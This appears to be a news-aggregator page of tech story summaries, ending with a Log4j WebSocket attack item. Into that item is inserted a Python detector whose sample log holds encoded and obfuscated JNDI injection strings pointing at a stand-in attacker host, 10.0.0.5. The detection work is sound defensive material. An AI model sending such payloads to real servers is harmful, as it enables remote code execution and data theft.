The Almighty Buck

RadioShack Announces Ambitious New Cryptocurrency Exchange (radioshack.com)

RadioShack.com is now showing visitors a new message: "Bringing cryptocurrency to the mainstream..."

With a 100-year-old brand, "we are going to lead the way for blockchain tech to reach mainstream adoption by other large brands."

The RadioShack home page says they'll start with a "symbiosis" with Atlas USV, a community-driven project to build a universal, decentralized/widely accessible DeFi base layer. Atlas USV's "Barter" mechanism lets users purchase third-party tokens and transfer them to Atlas USV's treasury in return for discounted USV tokens. "The Atlas USV treasury can accumulate any crypto asset of its choice with this dynamic...

"Once the liquidity pool surpasses other exchanges' liquidity level in any token pair, our swap efficiency will be unbeatable for that pair...

"Other decentralized exchanges margins on swap fees are our opportunity.... "

Or, as they explain on a more detailed web page, "We intend RadioShack to be the first protocol to pass over into mainstream usage in the history of DeFI," promising that RadioShack DeFi "will become the first to market with a 100 year old brand name that's recognized in virtually all 190+ countries in the world..."

"RadioShack has one objective: Distribution and usage by millions of individuals but possibly more important, by hundreds of blue-chip, large corporations as their gateway into becoming blockchain companies."

Currently there's a sign-up form for a notification when "RADIO token" launches (as well as links to their channels on Discord and Telegram).

Their "Fundamentals" page explains that "It is our hypothesis that the best way for crypto to be more mainstream is for an established brand name in the tech space to lead the way."

The RadioShack brand was purchased in November of 2020 by e-commerce rehabilitator REV, now listed as a collaborator on RadioShack's home page. (Ironically, the "Fundamentals" page also includes RadioShack's Super Bowl ad where their store is taken back by the 1980s.)

The official Twitter feed of Radio Shack now also has the same new tagline: "Bringing Cryptocurrency To The Mainstream."

Open Source

Who's Paying to Fix Open Source Software? (dev.to)

The Log4Shell exploit "exposes how a vulnerability in a seemingly simple bit of infrastructure code can threaten the security of banks, tech companies, governments, and pretty much any other kind of organization," writes VentureBeat. But the incident also raises some questions: Should large deep-pocketed companies besides Google, which always seems to be heavily involved in such matters, be doing more to support the cause with people and resources?
Long-time Slashdot reader frank_adrian314159 shares a related article from a programming author on Dev.To, who'd read hot takes like "Open source needs to grow the hell up" and "'Open source' is broken". [T]he log4j developers had this massive security issue dumped in their laps, with the expectation that they were supposed to fix it. How did that happen? How did a group of smart, hard-working people get roped into a thankless, high-pressure situation with absolutely no upside for themselves...?

It is this communal mythology I want to talk about, this great open source brainwashing that makes maintainers feel like they need to go above and beyond publishing source code under an open source license — that they need to manage and grow a community, accept contributions, fix issues, follow vulnerability disclosure best practices, and many other things...

In reality, what is happening is that open source maintainers are effectively unpaid outsourcing teams for giant corporations.

The log4j exploit was first reported by an engineer at Alibaba — a corporation with a market capitalization of $348 billion — so the article wonders what would happen if log4j's team had sent back a bill for the time they'd spent fixing the bug.

Some additional opinions (via the "This Week in Programming" column):
  • PuTTY maintainer Andrew Ducker: "The internet (and many large companies) are dependent on software maintained by people in their spare time, for free. This may not be sustainable."
  • Filippo Valsorda, a Go team member at Google: "The role of Open Source maintainer has failed to mature from a hobby into a proper profession... The status quo is unsustainable.... GitHub Sponsors and Patreon are a nice way to show gratitude, but they are an extremely unserious compensation structure."

Valsorda hopes to eventually see "a whole career path with an onramp for junior maintainers, including training, like a real profession."

Science

Forget Dogs: These Rats Could Be the Future of Search and Rescue (science.org)

Slashdot reader sciencehabit writes: Think search and rescue animal, and you're likely to picture a dog in an orange vest. But a Tanzanian nonprofit wants you to imagine something else: the African giant pouched rat. Donna Kean and her colleagues at APOPO, a nonprofit that trains pouched rats to save lives, have spent the past 2 decades working with the curious animals (Cricetomys ansorgei) to sniff out tuberculosis and track down land mines. Now, they're moving on to search and rescue.

Science caught up with Kean to chat about the new project, known as RescueRats. Topics include just how to train a rat, what advantages they have over dogs, and whether people would be freaked out about a rodent coming to save them.

China

Beatings, Doxxings, Harassment: the War Over Chinese Wikipedia (fastcompany.com)

The Wikimedia Foundation banned seven high-level users in September and temporarily demoted a dozen others for abuses "unprecedented in scope and nature." Slashdot reader harrymcc explains: The foundation accused these volunteers of biasing it in favor of the Chinese government's viewpoint. This incident involves beatings, doxxings, and harassment designed to ensure pro-Beijing content.
harrymcc is also technology editor at Fast Company, which got more details from Wikimedia's VP of Community Resilience & Sustainability, Maggie Dennis: Dennis said a monthlong investigation found that the veteran editors were "coordinating to bias the encyclopedia and bias positions of authority" around a pro-Beijing viewpoint, in part by meddling in administrator elections and threatening, and even physically assaulting, other volunteers...

Wikipedians in China have it especially hard, because the government blocks the site and makes accessing it a crime... But as with the dedicated mainland users of blocked apps like Instagram, Telegram, and Twitter, the prohibition hasn't deterred hundreds of volunteers, who tunnel through the Great Firewall with VPNs, and now make up a small but die-hard part of the Chinese Wikipedia community. Despite China's blockade, the site remains one of the ten most active language versions of Wikipedia, thanks largely to growing numbers of editors based in Taiwan and Hong Kong...

[A]mid acute worries over China's influence in both places, the community's mix of users and viewpoints has grown increasingly combustible. In 2014, when mainland editors were in the majority, there were few references to the Hong Kong protests; more recently, swarms of "pro Beijing" editors and "pro democracy" editors have battled over how exactly to depict those and similar events. Were the students at a particular rally in Hong Kong protesters or were they rioters? Is a state-backed news outlet a reliable source?

In some cases, the Foundation found, the fights had spread beyond online harassment into real-life threats, and worse... Dennis says there is no evidence the banned editors were backed by the government...

[U]ntil September, the Foundation had only issued 86 bans since 2012, and typically only one at a time. Suddenly, the Foundation's bans and penalties had knocked out a third of the Chinese edition's administrators.

China "is home to the world's largest population of internet users and to the world's most sophisticated apparatus for policing them," the article notes.

It argues that the banned users "liked to defend Beijing's point of view, but they also liked their influence over the Wiki community; and a pro-China stance allowed them to more easily fly under the government's radar. To protect their fiefdom, they sometimes resorted to personal threats, harassment, and assault." Since the ban, they've now launched a "hard fork" of Chinese Wikipedia which already has 400,000 articles, "tailored to appease government censors so that anyone on the mainland can access it."

The article also explores the possibility of having one global version of Wikipedia, rather than separate local editions.

Power

Imagining an All-Renewable Grid With No Blackouts Without Long-Duration Batteries (stanford.edu)

Slashdot reader SoftwareArtist shares an announcement from a Stanford University institute for environmental studies. "For some, visions of a future powered by clean, renewable energy are clouded by fears of blackouts driven by intermittent electricity supplies," the announcement begins.

"Those fears are misplaced, according to a new Stanford University study that analyzes grid stability under multiple scenarios in which wind, water and solar energy resources power 100% of U.S. energy needs for all purposes." "This study is the first to examine grid stability in all U.S. grid regions and many individual states after electrifying all energy and providing the electricity with only energy that is both clean and renewable," said study lead author Mark Z. Jacobson, a professor of civil and environmental engineering at Stanford... Imagine all cars and trucks were powered with electric motors or hydrogen fuel cells, electric heat pumps replaced gas furnaces and water heaters, and wind turbines and solar panels replaced coal and natural gas power plants. The study envisions those and many more transitions in place across the electricity, transportation, buildings and industrial sectors in the years 2050 and 2051...

Interconnecting larger and larger geographic regions made power supply smoother and costs lower because it raised the chances that wind, sun and hydro power would be available and reduced the need for extra wind turbines, solar panels and batteries. A significant finding of the study was that long-duration batteries were neither needed nor helpful for keeping the grid stable. Instead, grid stability could be obtained by linking together currently available batteries with storage durations of four hours or less. Linking together short-duration batteries can provide long-term storage when they are used in succession. They can also be discharged simultaneously to meet heavy peaks in demand for short periods. In other words, short-duration batteries can be used for both big peaks in demand for short periods and lower peaks for a long period or anything in-between.

Other findings:
  • Cleaner air would spare about 53,200 people from pollution-related deaths every year. It would also spare millions more from pollution-related illnesses. Total estimated health costs saved each year: $700 billion.
  • Building and operating a completely renewable grid may create 4.7 million long-term jobs.
  • Per capita household energy costs were nearly 63% less.
  • New electricity generators would occupy about 0.84% of U.S. land (versus roughly 1.3% occupied today by the fossil fuel industry).

NASA

Astronomers Nervously Counting Down to Christmas Eve Launch of $10B Webb Telescope (nytimes.com)

"What do astronomers eat for breakfast on the day that their $10 billion telescope launches into space?" asks the New York Times. "Their fingernails."

The worst-case scenario is "You work for years and it all goes up in a puff of smoke," they're told by Marcia Rieke of the University of Arizona: Dr. Rieke admits her fingers will be crossed on the morning of December 24 when she tunes in for the launch of the James Webb Space Telescope. For 20 years, she has been working to design and build an ultrasensitive infrared camera that will live aboard the spacecraft. The Webb is the vaunted bigger and more powerful successor to the Hubble Space Telescope. Astronomers expect that it will pierce a dark curtain of ignorance and supposition about the early days of the universe, and allow them to snoop on nearby exoplanets.

After $10 billion and years of delays, the telescope is finally scheduled to lift off from a European launch site in French Guiana on its way to a point a million miles on the other side of the moon... [T]here is plenty to be anxious about. The Ariane 5 rocket that is carrying the spacecraft has seldom failed to deliver its payloads to orbit. But even if it survives the launch, the telescope will have a long way to go. Over the following month it will have to execute a series of maneuvers with 344 "single points of failure" in order to unfurl its big golden mirror and deploy five thin layers of a giant plastic sunscreen that will keep the telescope and its instruments in the cold and dark. Engineers and astronomers call this interval six months of high anxiety because there is no prospect of any human or robotic intervention or rescue should something go wrong.

But if all those steps succeed, what astronomers see through that telescope could change everything. They hope to spot the first stars and galaxies emerging from the primordial fog when the universe was only 100 million years or so old, in short the first steps out of the big bang toward the cozy light show we inhabit today.

Tod Lauer, an astronomer at NOIRLab in Tucson, Arizona, remembers the launch of the original Hubble Space Telescope — and told the Times that astronomers had to trust their colleagues in rocket and spacecraft engineering to get it right.

"Someone who knows how to fly a $10 billion spacecraft on a precision trajectory is not going to be impressed by an astronomer, who never took an engineering course in his life, cowering behind his laptop watching the launch," Dr. Lauer said. "You feel admiration and empathy for those people, and try to act worthy of the incredible gift that they are bringing to the world."

On Friday the manufacturer of the rocket carrying the telescope tweeted an update ("Target launch date is December 24 at 12:20 am UTC") and confirmed it again on Saturday...

Medicine

Hospital's Computer System Always Marks Up Costs Automatically, Leaked Records Show (msn.com)

"Ridiculous, seemingly arbitrary price markups are a defining characteristic of the $4-trillion U.S. healthcare system — and a key reason Americans pay more for treatment than anyone else in the world," writes a business columnist for the Los Angeles Times.

"But to see price hikes of as much as 675% being imposed in real time, automatically, by a hospital's computer system still takes your breath away."

Long-time Slashdot reader fahrbot-bot quotes their report: I got to view this for myself after a former operating-room nurse at Scripps Memorial Hospital in Encinitas shared with me screenshots of the facility's electronic health record system.... What they show are price hikes ranging from 575% to 675% being automatically generated by the hospital's software. The eye-popping increases are so routine, apparently, the software even displays the formula it uses to convert reasonable medical costs to billed amounts that are much, much higher. For example, one screenshot is for sutures — that is, medical thread, a.k.a. stitches. Scripps' system put the basic "cost per unit" at $19.30. But the system said the "computed charge per unit" was $149.58. This is how much the patient and his or her insurer would be billed.

The system helpfully included a formula for reaching this amount: "$149.58 = $19.30 + ($19.30 x 675%)."

You read that right. Scripps' automated system took the actual cost of sutures, imposed an apparently preset 675% markup and produced a billed amount that was orders of magnitude higher than the true price. This is separate from any additional charges for the doctor, anesthesiologist, X-rays or hospital facilities.

Call it institutionalized price gouging. And it's apparently widespread because the same or similar software is used by other hospitals nationwide, including UCLA, and around the world... Healthcare providers routinely ignore the actual cost of treatment when calculating bills and instead cook up nonsensical figures to push reimbursement from insurers higher. For the millions of people without health insurance, those sky-high prices are what they're stuck with (although most hospitals, including Scripps, typically will offer discounts in such circumstances).

Piracy

Guitarist Eric Clapton Successfully Sues Woman For Posting $11 Bootleg (guitarworld.com)

Long-time Slashdot reader kjshark writes: Eric Clapton has successfully sued a German woman who posted an illegal recording for €9.95 (about $11) on eBay. The CD was a single bootlegged recording of a Clapton concert from the 1980s.

After Clapton sent a court in Düsseldorf an affidavit stating the recordings were illegal, the defendant claimed she was unaware the CD was recorded illegally and that her late husband originally purchased the CD at a department store in 1987. Her appeal was rejected by the court.

The court ruled that the woman pay the legal fees for both parties which amount to around $3,500 and that if she continues to keep the recording up on eBay she'll face six months in prison or a fine of around $283,000.

The Courts

Trial Ends For Theranos Founder Elizabeth Holmes (msn.com)

"Both sides made closing arguments this week in Theranos founder Elizabeth Holmes' fraud trial," reports Business Insider: Prosecutors said Holmes "chose to be dishonest" and that her allegations of abuse, which were a key part of her defense, were irrelevant. The defense said "rats flee a sinking ship" but Holmes stayed, noting "that's who that woman is...."

Prosecutors kicked off their arguments by recapping testimony from each of their 29 witnesses. They argued that Holmes saw money dry up at Theranos while its progress languished and had to decide whether to "watch Theranos slowly fail" or defraud investors and patients. "She chose fraud over business failure. She chose to be dishonest," said Assistant U.S. Attorney Jeffrey Schenk, according to NBC News. "That choice was not only callous, it was criminal."

Prosecutors revisited Holmes' bombshell admissions during her seven days of testimony, including that she added pharmaceutical companies' logos to validation reports without authorization and kept Theranos' use of modified third-party devices a secret. Holmes has said she wanted to convey that the reports were the result of work done with those pharmaceutical companies and that she withheld information about the use of commercial devices because it was a trade secret.

The New York Times argues historians will see the trial as "a case study in the use of clothing to affect opinion (public and judicial) and, if not to make friends, at least to influence people. Or try to." When the verdict comes down, the transformation of the wunderkind founder of Theranos from black-clad genius to besuited milquetoast will be an integral part of the story. Did it work, or was it a seemingly transparent effort to play the relatable card? Rarely has there been as stark an example of Before and After.... Gone were her signature black turtlenecks and black slacks; gone the bright red lipstick and blond hair ironed straight as a board or pulled into a chignon.... Instead there was ... sartorial neutrality, in the form of a light gray pantsuit and light blue button-down shirt, worn untucked, with baby pink lipstick. She looked more like the college student trying on a grown-up interview look than the mastermind of a multimillion-dollar fraud scheme.... There was not a power heel or a power shoulder in sight. The only part of her outfit that was branded in any way was her diaper bag backpack (her son was born in July), which was from Freshly Picked and costs around $175...

The net effect of Ms. Holmes's makeover was middle manager or backup secretarial character in a streaming series about masters of the universe (but not her! uh-uh), with the diaper bag functioning as an implicit reminder of her maternal status and family values. In case that accessory wasn't enough, she often entered the courthouse with an actual family member — her mother, her partner — in tow, and a hand to cling to. It was code-switching of the most skillful kind. It was relatable. One of the stereotypes of Silicon Valley's superstars, after all, is that they are other: speaking in bits, relating to machines more than people; living, literally, in a different reality. When you want a jury to sympathize with your plight, you have to make them imagine themselves in your shoes. Which means, you need to look, if not like them, at least like someone they might know.

GNU is Not Unix

FSF Adopts New Governance Measures: a Board Member Agreement and Code of Ethics (fsf.org)

The Free Software Foundation's board "has approved and implemented two new measures designed to help make FSF governance more transparent, accountable, ethical, and responsible," according to an FSF announcement.

First a Board Member Agreement "enumerates the responsibilities of board members." And there's also a Code of Ethics "that lays out principles to guide their decision-making and activities." The new measures are the first products of a six-month, consultant-led review. They formalize crucial aspects of the FSF's governance, and will guide board members to understand and embrace their responsibilities to the nonprofit's worldwide mission to promote computer user freedom.

The new Board Member Agreement spells out nineteen duties and responsibilities, including minimum expectations for organizational and financial oversight, participation in board activities, the recruitment of associate members, and annual performance reviews. The Code of Ethics details thirteen specific provisions establishing how the board of directors will conduct the business affairs of the organization in good faith and with honesty, integrity, due diligence, and competence.

All current board members have signed and committed to upholding the new governance standards.

The agreement clarifies that Board members "do not have individual direct authority over FSF staff. Individual board members will not try to give staff instructions about what to do in their FSF work, nor try to pressure them about what to do." Board members also agree not to participate in discussions and votes where they might have a conflict of interest.

"In signing this document, I understand that no quotas are being set, that no rigid standards of measurement or achievement are being formed. I have confidence that other board members will operate in good faith to carry out these agreements to the best of their ability."

"The FSF has always been a steady beacon for freedom and against the widespread mistreatment of computer users," says FSF president Geoffrey Knauth in the announcement. "In the last year, the board realized that we faced a challenge and opportunity to improve our governance practices and recruit new leaders to the FSF board. I'm proud of this important step in that ongoing work."

Crime

Boston Police Bought Spy Tech With a Pot of Money Hidden From the Public (propublica.org)

An anonymous reader quotes a report from ProPublica: Across the country, some law enforcement agencies have deployed controversial surveillance technology to track cellphone location and use. Critics say it threatens constitutional rights, and members of Congress have moved to restrain its use. Nonetheless, in 2019 the Boston Police Department bought the device known as a cell site simulator -- and tapped a hidden pot of money that kept the purchase out of the public eye. A WBUR investigation with ProPublica found elected officials and the public were largely kept in the dark when Boston police spent $627,000 on this equipment by dipping into money seized in connection with alleged crimes.

Also known as a "stingray," the cell site simulator purchased by Boston police acts like a commercial cellphone tower, tricking nearby phones into connecting to it. Once the phones connect to the cell site simulator's decoy signal, the equipment secretly obtains location and other potentially identifying information. It can pinpoint someone's location down to a particular room of a hotel or house. While this briefcase-sized device can help locate a suspect or a missing person, it can also scoop up information from other phones in the vicinity, including yours. The Boston police bought its simulator device using money that is typically taken during drug investigations through what's called civil asset forfeiture.

An August investigation by WBUR and ProPublica found that even if no criminal charges are brought, law enforcement almost always keeps the money and has few limitations on how it's spent. Some departments benefit from both state and federal civil asset forfeiture. The police chiefs in Massachusetts have discretion over the money, and the public has virtually no way of knowing how the funds are used. The Boston City Council reviews the BPD annual budget, scrutinizing proposed spending. But the surveillance equipment wasn't part of the budget. Because it was purchased with civil forfeiture funds, BPD was able to circumvent the council. According to an invoice obtained by WBUR, the only city review of the purchase -- which was made with federal forfeiture funds -- came from the Procurement Department, confirming that the funds were available. In fact, it was only after sifting through hundreds of documents received through public records requests that WBUR discovered BPD had bought the device from North Carolina-based Tactical Support Equipment Inc., which specializes in surveillance technology.

The Courts

H&R Block Sues Over Square's New Name 'Block' (cnbc.com)

H&R Block filed a trademark infringement lawsuit over Square's new name, "Block," on Thursday. CNBC reports: The tax preparation service seeks to keep Block from using the new name, saying in a press release that the fintech company "would improperly capitalize on the goodwill and consumer trust cultivated by Block since 1955." H&R Block said the renamed company competes with it directly in financial services, including through its recent acquisition of Credit Karma Tax for tax preparation. It alleged the name would be overly confusing for consumers, especially given the two companies' overlapping offerings. "Today's filing is an important effort to prevent consumer confusion and ensure a competitor cannot leverage the reputation and trust we have built over more than six decades," said H&R Block President and CEO Jeff Jones in a statement.

Space

A Domestic Newspaper Warns of the Russian Space Program's 'Rapid Collapse' (arstechnica.com)

A long and strikingly critical article that reviews the state of the Russian space program was published in the state-aligned newspaper MK this week. This article was written by Dmitry Popov, who has worked at the publication since 1992. Ars Technica reports: The article, translated for Ars by Rob Mitchell, is titled "The Space Program Is Rotting from Within." It begins with the declaration that Russia's space program has a shortage of competent and highly qualified staff, obsolete facilities and technology, and "systemic leadership weakness." And that's just the opening paragraph. Popov goes on to state that Russian space companies are delinquent on promised deliveries for hundreds of contracts. For example, the Khrunichev Center agreed to deliver 10 booster cores for the Angara A5 rocket five years ago. The first five cores were delivered only in March of this year, and the other five are not yet completed. [...] Popov said Roscosmos is struggling even to build its mainstay vehicles, the Soyuz rockets and Progress spacecraft. Consider a recent docking issue with the Progress vehicle, which carries supplies to the Russian segment of the International Space Station.

Popov further expressed concern about reliance on Germany to help fuel the Soyuz rocket and the Soyuz spacecraft that launches humans. The issue is that vernier thrusters on the Soyuz boosters and in the de-orbit engines of the Soyuz-MS spacecraft use a special grade of highly refined hydrogen peroxide. Production of this hydrogen peroxide in Russia, however, depends on deliveries of chemicals produced by a German company called Evonik Resource Efficiency GmbH. These deliveries are subject to limitation by international sanctions against the Russian Federation. "That is, the West can stop Russian space launches with a single keystroke," Popov wrote.

The article also discusses the Vostochny Cosmodrome, a spaceport in eastern Russia that has been a priority for President Vladimir Putin. However this project, under Rogozin's stewardship, has been beset by construction delays and corruption, such as embezzlement. Of the nearly 1,200 structures planned for construction at the spaceport, only about 200 have been completed, Popov wrote. Construction has yet to begin on more than 40 percent of them. Already, the planned launch of Angara A5 rockets from Vostochny has been delayed from 2021 to 2023, as criminal investigations continue. Popov then turns to Russia's so-called Moon program, which requires development of the Oryol, or "Eagle," spacecraft to fly cosmonauts into deep space. This vehicle was intended to both replace the Soyuz for transporting cosmonauts to the International Space Station and to form part of the lunar program. But aside from that, everything is going swell with Russia's Moon program.

Popov also criticizes Rogozin for over-promising on Russian launch efficiency and under-delivering. For example, Roscosmos said there would be 44 space launches in 2019, and 25 were conducted. In 2020, 40 launches were planned and just 17 conducted. This year, Russia has conducted fewer than half of its planned 47 launches. Roscosmos, therefore, has decided to no longer publish its planned number of launches. The overall portrait Popov paints of Roscosmos is that of a wasteful, increasingly decrepit enterprise where almost no money is being invested into the present or future. Instead, the focus seems to be providing high-paying jobs for a handful of technocrats, whose salaries are worth hundreds of thousands of dollars a year. Meanwhile, the average monthly wages for technical specialists who build the country's rockets and spacecraft range from $500 to $1,000 a month.

Bitcoin

US Regulators Flag Climate Change, Stablecoins As Potential Systemic Risks (reuters.com)

An anonymous reader quotes a report from Reuters: Climate change, the rapid growth of "stablecoins" and financial innovations that led to frenzied trading of GameStop shares early this year are threats to the U.S. financial system that merit closer scrutiny, a Treasury Department-led regulatory panel said on Friday. In its annual report, the Financial Stability Oversight Council (FSOC) added that while the U.S. economy has improved since the onset of the COVID-19 pandemic, risks to the financial system are higher than prior to the health crisis, with the outlook for global growth still uncertain.

The report marked the first time the body, which was created in the wake of the 2007-2009 financial crisis to spot looming threats, has flagged climate change as a major risk, reflecting President Joe Biden's push to address rising global temperatures. The FSOC, which comprises the Treasury and other financial regulators, said the physical risks posed by more frequent severe weather events and government policies transitioning away from carbon-heavy industry could dent asset values and weaken institutions, echoing an October FSOC paper. "If these changes occur in a disorderly way owing to substantial delays in action or abrupt changes in policy, their impact is likely to be more sudden and disruptive," the FSOC said.

Similarly, the body reiterated concerns flagged in November that stablecoins, a fast-growing type of digital asset pegged to traditional currencies, could become a threat if widely adopted. While that market is currently only worth about $127 billion, its market value has ballooned more than 500% over the past 12 months and may be vulnerable to runs if investors lose confidence in the asset class's reliability, the FSOC said. The body also noted a surge of volatility earlier this year sparked by retail investors, who coordinated on social media and used zero-commission trading apps to fuel sharp rises in a handful of stocks, including videogame maker GameStop. The episode suggested financial innovations and social media are changing market participation, raising the risk of sudden asset price movements unrelated to fundamental news. That "could represent a vulnerability if they lead to cascading impacts by causing asset liquidations or putting stress on financial institutions," the FSOC wrote.

Java

Security Firm Blumira Discovers Major New Log4j Attack Vector (zdnet.com) 70

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered JavaScript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that, by using one of the many Java Naming and Directory Interface (JNDI) exploits, they could trigger it via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI), default port 1099, although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, once an open port to a local service or a service accessible to the host is found, it can drop the JNDI exploit string in the path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants.

Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.
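The detection side of what is described above, as an added example that is not code from Blumira, ZDNet or the Log4j project: the JNDI lookup string lands in a request path or parameter, and because Log4j 2 resolves its own lookup syntax (${lower:...}, ${upper:...} and the ${name:-default} fallback) before the word "jndi" ever appears, a detector has to normalize the same way before pattern matching, or a plain grep for "jndi" misses the obvious evasions. The script below does that normalization, extracts the JNDI scheme, host and port from each finding, and maps missing ports to the defaults of DNS, LDAP, LDAPS and RMI (the same four ports the egress advice singles out). The access-log lines and the 10.0.0.5 address are constructed for this example and stand in for a vulnerable service's own request log and an attacker-controlled JNDI server.

```python
"""Detect Log4j JNDI lookup strings in request paths, parameters and
logged headers after undoing the lookup syntax Log4j 2 itself resolves."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Innermost ${...} lookup (no nested braces inside the body).
_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# jndi:<scheme>://<host>[:port] once the obfuscation has been removed.
_JNDI = re.compile(r"jndi:\s*([a-z]+)://([^/\s:}\]]+)(?::(\d+))?", re.IGNORECASE)
# Default ports of the JNDI transports; the same four ports the egress
# advice in the article singles out.
DEFAULT_PORTS = {"dns": 53, "ldap": 389, "ldaps": 636, "rmi": 1099}


def _resolve_lookup(m):
    """Evaluate one innermost ${...} the way Log4j 2 would, for the subset
    attackers use to hide the word "jndi": ${lower:x}, ${upper:x} and the
    ${unknown:-default} form, which yields the default when the lookup
    does not exist (so ${::-j}${::-n}${::-d}${::-i} spells "jndi")."""
    body = m.group(1)
    folded = body.lower()
    if folded.startswith("jndi:"):
        return m.group(0)           # the lookup we are hunting: keep it
    if folded.startswith("lower:"):
        return body[len("lower:"):].lower()
    if folded.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)               # some other lookup: leave untouched


def normalize(text, max_rounds=16):
    """Undo URL encoding (a few layers) and resolve lookups inside-out
    until nothing changes. Bounded so hostile input cannot loop forever."""
    for _ in range(3):
        text = unquote(text)
    previous = None
    for _ in range(max_rounds):
        if text == previous:
            break
        previous = text
        text = _LOOKUP.sub(_resolve_lookup, text)
    return text


def find_jndi(text) -> List[Dict]:
    """Return the JNDI targets (scheme, host, port) referenced in text."""
    hits = []
    for scheme, host, port in _JNDI.findall(normalize(text)):
        scheme = scheme.lower()
        hits.append({"scheme": scheme, "host": host,
                     "port": int(port) if port else DEFAULT_PORTS.get(scheme)})
    return hits


def scan_log(lines) -> List[Dict]:
    """Scan whole log lines (request line, query string and logged headers
    alike) and tag each finding with its 1-based line number."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        for hit in find_jndi(line):
            findings.append({"line_no": line_no, **hit})
    return findings


# Constructed access-log lines, not real traffic. 10.0.0.5 stands in for
# an attacker-controlled JNDI server and is an assumption of this example.
SAMPLE_LOG = [
    '10.1.1.9 - - [20/Dec/2021:10:00:01 +0000] "GET /healthz HTTP/1.1" 200 12',
    '10.1.1.9 - - [20/Dec/2021:10:00:02 +0000] "GET /%24%7Bjndi%3Armi%3A%2F%2F10.0.0.5%3A1099%2Fa%7D HTTP/1.1" 404 0',
    '10.1.1.9 - - [20/Dec/2021:10:00:03 +0000] "GET /?q=${${lower:J}ndi:ldap://10.0.0.5/x} HTTP/1.1" 400 0',
    '10.1.1.9 - - [20/Dec/2021:10:00:04 +0000] "GET /${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}${::-s}://10.0.0.5:1636/x} HTTP/1.1" 404 0',
    '10.1.1.9 - - [20/Dec/2021:10:00:05 +0000] "GET /socket HTTP/1.1" 101 0 "-" "${jndi:dns://10.0.0.5/exfil}"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line_no']}: {hit['scheme']} -> {hit['host']}:{hit['port']}")
```

Run it against the application's own request log rather than a network capture: as the article notes, a WebSocket-originated request to a localhost service may never cross a monitored network boundary, but it still reaches the listening server, and that is where the string gets logged. The host and port of each finding are exactly the destinations an egress allowlist should be blocking.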

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "
